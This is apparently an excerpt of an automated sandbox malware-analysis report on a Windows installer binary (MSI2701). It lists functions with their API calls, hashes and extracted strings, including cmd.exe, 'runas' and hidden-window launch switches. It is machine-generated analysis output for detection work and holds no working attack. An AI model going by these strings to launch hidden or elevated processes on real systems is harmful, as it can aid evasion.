575->561 579 4c56f3-4c56f4 BringWindowToTop 575->579 576->572 578 4c56ed 576->578 578->579 579->561
                                                                                                                                                            APIs
                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 004C549C
                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 004C551D
                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 004C5601
                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 004C5637
                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 004C567C
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C5685
                                                                                                                                                            • AllowSetForegroundWindow.USER32(00000000), ref: 004C568B
                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 004C56AB
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C56AE
                                                                                                                                                            • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 004C56CA
                                                                                                                                                            • EnumWindows.USER32(004C5830,?), ref: 004C56DF
                                                                                                                                                            • BringWindowToTop.USER32(00000000), ref: 004C56F4
                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 004C5711
                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 004C571B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                                                                                                            • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$<SQ$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                            • API String ID: 697762045-1319285285
                                                                                                                                                            • Opcode ID: 3464f6543471d6bee9960a24a1e6996370d2cb24d36132d57037e5124317d8a1
                                                                                                                                                            • Instruction ID: a27b425bf507880839110d8422e8c5e91b412a1042964e2a610b1bdf1eb7d97a
                                                                                                                                                            • Opcode Fuzzy Hash: 3464f6543471d6bee9960a24a1e6996370d2cb24d36132d57037e5124317d8a1
                                                                                                                                                            • Instruction Fuzzy Hash: 9CE1D339A00A09DBDB54DFA4C844FAEBBF1BF48314F54412EE815AB391E738AD81CB54
                                                                                                                                                            Function 004CC870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 004CCBB6
                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0051E6D0,00000800), ref: 004CCBD3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                                            • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                            • API String ID: 4153817207-482544602
                                                                                                                                                            • Opcode ID: 73bb0f9310603da78a8cb40f4d2f383f993a1c72ee61f190ca8c8ebf57841502
                                                                                                                                                            • Instruction ID: 8b3ef24cbc4d178e158172eeb13157a8f747c3c046139dc8270e2095d1f169d3
                                                                                                                                                            • Opcode Fuzzy Hash: 73bb0f9310603da78a8cb40f4d2f383f993a1c72ee61f190ca8c8ebf57841502
                                                                                                                                                            • Instruction Fuzzy Hash: 8CC1F27C500216CACBA4AF14D881B7BB6A2FF90740F59845FE88D8B350F7399D82C799
                                                                                                                                                            Function 004FDE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,004F42D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004FDEE5
                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004F42D9,?,?,?,00000055,?,-00000050,?,?), ref: 004FDF10
                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 004FDFA4
                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 004FDFB2
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004FE073
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                            • String ID: utf8
                                                                                                                                                            • API String ID: 4147378913-905460609
                                                                                                                                                            • Opcode ID: 4f45a6ee4ccf0a0babd1297b624cec187ea79360763abbd4b69a51ff08cb6510
                                                                                                                                                            • Instruction ID: 34d7ce39cca1545f1cc4fc7b157e534c4e5070e299ee148fa93636f6186e5091
                                                                                                                                                            • Opcode Fuzzy Hash: 4f45a6ee4ccf0a0babd1297b624cec187ea79360763abbd4b69a51ff08cb6510
                                                                                                                                                            • Instruction Fuzzy Hash: 6C710931A00719AAD724AF36CC45BBB73A9EF14709F10442BF706DB291EBBCD900C669
                                                                                                                                                            Function 004C3860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,C7C71CC4,?), ref: 004C38CB
                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004C390B
                                                                                                                                                            • Process32FirstW.KERNEL32(?,00000000), ref: 004C395F
                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004C397A
                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004C3A8E
                                                                                                                                                            • Process32NextW.KERNEL32(?,00000000), ref: 004C3AA2
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004C3AF0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 708755948-0
                                                                                                                                                            • Opcode ID: bc7b10fb7254a3e0914ac5d1ebf8febb41cd14a555fba57829574daa17241ac2
                                                                                                                                                            • Instruction ID: f433beda29cf48d6696e7ca91fe5df414ec991aeec885d445f050c73981c0ec5
                                                                                                                                                            • Opcode Fuzzy Hash: bc7b10fb7254a3e0914ac5d1ebf8febb41cd14a555fba57829574daa17241ac2
                                                                                                                                                            • Instruction Fuzzy Hash: CAA109B5901249DFDF10CFA5D988BDEBBF8BF48304F14815EE805AB240D7B95A44CBA4
                                                                                                                                                            Function 004FF032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                            • Opcode ID: dc1301c3c6ef149c33fa982cc7f06948027dffcee70ac48a0370fa3319f3f74f
                                                                                                                                                            • Instruction ID: ef60e1807b67fbc1fd2f6309078f785255d93c8df74c22e836b13e82cbdce80d
                                                                                                                                                            • Opcode Fuzzy Hash: dc1301c3c6ef149c33fa982cc7f06948027dffcee70ac48a0370fa3319f3f74f
                                                                                                                                                            • Instruction Fuzzy Hash: 1BD22871E082298BDB25CE28DD407EAB7B5FF44305F1445EAD90DE7280EB78AE858F45
                                                                                                                                                            Function 004FE5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,004FE8D1,00000002,00000000,?,?,?,004FE8D1,?,00000000), ref: 004FE64C
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,004FE8D1,00000002,00000000,?,?,?,004FE8D1,?,00000000), ref: 004FE675
                                                                                                                                                            • GetACP.KERNEL32(?,?,004FE8D1,?,00000000), ref: 004FE68A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                            • Opcode ID: 0a9835047c84b0c0d1f9b010bdba7cf6c0923bb3a2d4bebfe10b98154bbb2b93
                                                                                                                                                            • Instruction ID: 5929a9128474423d0e923a23bfca82216f67999d51396abd8cfeda4a1a196317
                                                                                                                                                            • Opcode Fuzzy Hash: 0a9835047c84b0c0d1f9b010bdba7cf6c0923bb3a2d4bebfe10b98154bbb2b93
                                                                                                                                                            • Instruction Fuzzy Hash: 2921A93160010CAAEB34CF56C900ABB77A7AB74B66B968466EB09D7360E736DD41C358
                                                                                                                                                            Function 004C9CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _swprintf$FreeLocal
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2429749586-0
                                                                                                                                                            • Opcode ID: 5eb3327ca18ffbe47527467d7fa325606c8baef36b557c110b2d29e978578ab5
                                                                                                                                                            • Instruction ID: dfcc9b5be4c1cfe954a0481b3d653b14196517e8553d94614c7761e09934b828
                                                                                                                                                            • Opcode Fuzzy Hash: 5eb3327ca18ffbe47527467d7fa325606c8baef36b557c110b2d29e978578ab5
                                                                                                                                                            • Instruction Fuzzy Hash: 92F1BA75E00219ABDF14DFA9DC44FAEBBB9FB48314F14422EF801A7281D739A941CB95
                                                                                                                                                            Function 004FE788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004FE894
                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 004FE8DD
                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 004FE8EC
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004FE934
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004FE953
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                            • Opcode ID: ccff26ff0e9f87790a735f4b2a4b66da4d4ef949786f15d1cdf8d41abce2eb0e
                                                                                                                                                            • Instruction ID: 31e0528eeedb3ba527a079502b143cc8b81f9b3282d823382d30f44e720d8b68
                                                                                                                                                            • Opcode Fuzzy Hash: ccff26ff0e9f87790a735f4b2a4b66da4d4ef949786f15d1cdf8d41abce2eb0e
                                                                                                                                                            • Instruction Fuzzy Hash: 59517471A0020DABEB10FFA7CC45ABF77B8FF58742F14446AAA00E72A1D7749904D765
                                                                                                                                                            Function 004C2310 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 64memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004E2C98: EnterCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CA3
                                                                                                                                                              • Part of subcall function 004E2C98: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CE0
                                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 004C2365
                                                                                                                                                              • Part of subcall function 004E2C4E: EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
                                                                                                                                                              • Part of subcall function 004E2C4E: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
                                                                                                                                                              • Part of subcall function 004E2C4E: RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                            • String ID: <Q$XQ$\LQ$pLQ
                                                                                                                                                            • API String ID: 325507722-3596237423
                                                                                                                                                            • Opcode ID: 0da20be00a54135b0cf1165b2c77d8ed0103aee972bb7f84f243e01b581a4fa1
                                                                                                                                                            • Instruction ID: e40d342ec2187dba7748048b9034cd411b7a306f8fb3e0900b53b1bca274ec12
                                                                                                                                                            • Opcode Fuzzy Hash: 0da20be00a54135b0cf1165b2c77d8ed0103aee972bb7f84f243e01b581a4fa1
                                                                                                                                                            • Instruction Fuzzy Hash: 23217CB09012409BE310DF55FE07BC9BBB4FB34324F90821AEC29973E0D3B818489B55
                                                                                                                                                            Function 004F5D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                            • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                            • Instruction ID: f27fc527a4d38b11c01d6873642ffa6f1be84d52580d32e10453a6247995920a
                                                                                                                                                            • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                            • Instruction Fuzzy Hash: E2B169329046499FDB15CF28C881BFFBBA5EF55304F2581ABEB04AB341D6389D01CBA5
                                                                                                                                                            Function 004E33A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E33B4
                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004E3480
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004E34A0
                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 004E34AA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                            • Opcode ID: e367f8fcbaede1cda131bb796f381776cbb7109f2539a374d26169bb65bf363d
                                                                                                                                                            • Instruction ID: 15ded5397336e01ad8fbf139f3dcf0335836399ba3ce447db9e18b6e21e7376d
                                                                                                                                                            • Opcode Fuzzy Hash: e367f8fcbaede1cda131bb796f381776cbb7109f2539a374d26169bb65bf363d
                                                                                                                                                            • Instruction Fuzzy Hash: F4317875D0521C9BDB11DFA1D989BCDBBB8AF08305F1040EAE50CAB290EB749B89DF44
                                                                                                                                                            Function 004CD0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004CC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,C7C71CC4,?,00503D30,000000FF), ref: 004CC657
                                                                                                                                                              • Part of subcall function 004CC630: GetLastError.KERNEL32(?,00000000,00000000,C7C71CC4,?,00503D30,000000FF), ref: 004CC661
                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,00518AF0), ref: 004CD0D8
                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00518AF0), ref: 004CD0E7
                                                                                                                                                            Strings
                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004CD0E2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                            • API String ID: 3511171328-631824599
                                                                                                                                                            • Opcode ID: f061de765ed5a7b4678c1b556729e60d508915174f44fdae0c232bc2af346274
                                                                                                                                                            • Instruction ID: 2a9ae3a4acdc83bc6bf60f589a5050eb6866d8990a52df6e66bb0ec0f27a14f1
                                                                                                                                                            • Opcode Fuzzy Hash: f061de765ed5a7b4678c1b556729e60d508915174f44fdae0c232bc2af346274
                                                                                                                                                            • Instruction Fuzzy Hash: ACE09B74A047418FD3A09F2AE508B467FE4BF14308F04C96EE485C2680D7B8E44DCBA5
                                                                                                                                                            Function 004FE237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE28B
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE2D5
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE39B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                                            • Opcode ID: a4b0866684c04836046afa54c9467600aab7eeeceabb9b8a767edf821b0afb5e
                                                                                                                                                            • Instruction ID: a693ba451fe80c5d91f43afefe23648509f2d108c7e88d9567dd1de0bda05c4a
                                                                                                                                                            • Opcode Fuzzy Hash: a4b0866684c04836046afa54c9467600aab7eeeceabb9b8a767edf821b0afb5e
                                                                                                                                                            • Instruction Fuzzy Hash: 5261827150020BDBEB289F26CC86BBAB7A8EF14306F10417BEE05C62A5E77CD945CB54
                                                                                                                                                            Function 004E6E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
